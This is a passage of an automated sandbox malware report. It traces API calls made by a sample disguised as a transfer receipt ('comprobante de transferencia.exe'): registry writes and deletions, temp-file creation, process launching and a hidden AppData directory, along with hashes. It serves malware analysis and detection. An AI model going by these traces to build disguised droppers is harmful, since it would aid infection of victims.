                                            • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp
                                            • API String ID: 1356686001-2180064541
                                            • Opcode ID: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
                                            • Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
                                            • Opcode Fuzzy Hash: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
                                            • Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 782 405c1e-405c2a 783 405c2b-405c5f GetTickCount GetTempFileNameW 782->783 784 405c61-405c63 783->784 785 405c6e-405c70 783->785 784->783 786 405c65 784->786 787 405c68-405c6b 785->787 786->787
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405C3C
                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00405C57
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C23
                                            • "C:\Users\user\Desktop\comprobante de transferencia.exe", xrefs: 00405C1E
                                            • nsa, xrefs: 00405C2B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-2639927570
                                            • Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                            • Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
                                            • Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                            • Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                            • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                            • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                            • Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
                                            • Opcode Fuzzy Hash: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                            • Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                            • FreeLibrary.KERNEL32(?), ref: 1000187B
                                            • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                              • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                              • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                              • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                            • String ID:
                                            • API String ID: 1791698881-3916222277
                                            • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                            • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                            • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                            • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                            • Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
                                            • Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                            • Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F11
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F32
                                            • RegCloseKey.ADVAPI32(?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F55
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: Call
                                            • API String ID: 3677997916-1824292864
                                            • Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                            • Instruction ID: 1229758a71a34d9b3841ebc19c7c3eba7c9bd897b4c963cc492d8629085b1b1e
                                            • Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                            • Instruction Fuzzy Hash: B9011E3255020AEADF21CF55ED09EDB3BA9EF55350F004036F905D6160D335D964DFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                              • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                              • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00403160), ref: 004051D4
                                              • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll), ref: 004051E6
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                              • Part of subcall function 004056FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                              • Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730
                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 3585118688-0
                                            • Opcode ID: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
                                            • Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
                                            • Opcode Fuzzy Hash: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
                                            • Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                              • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                              • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                              • Part of subcall function 00405648: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,?,00000000,000000F0), ref: 00401645
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven, xrefs: 00401638
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven
                                            • API String ID: 1892508949-828510313
                                            • Opcode ID: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
                                            • Instruction ID: c4264af60da0efacfc01d1487171d30b62475a562f2de0234080d29f7ac7759b
                                            • Opcode Fuzzy Hash: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
                                            • Instruction Fuzzy Hash: 5611B631504504EBCF206FA5CD4199F3AB1EF54368B240A3BF946B61F1D63E4A81DE5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                            • CloseHandle.KERNEL32(?), ref: 00405730
                                            Strings
                                            • Error launching installer, xrefs: 0040570D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                            • Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
                                            • Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                            • Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                            • Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
                                            • Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                            • Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                            • Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
                                            • Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                            • Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
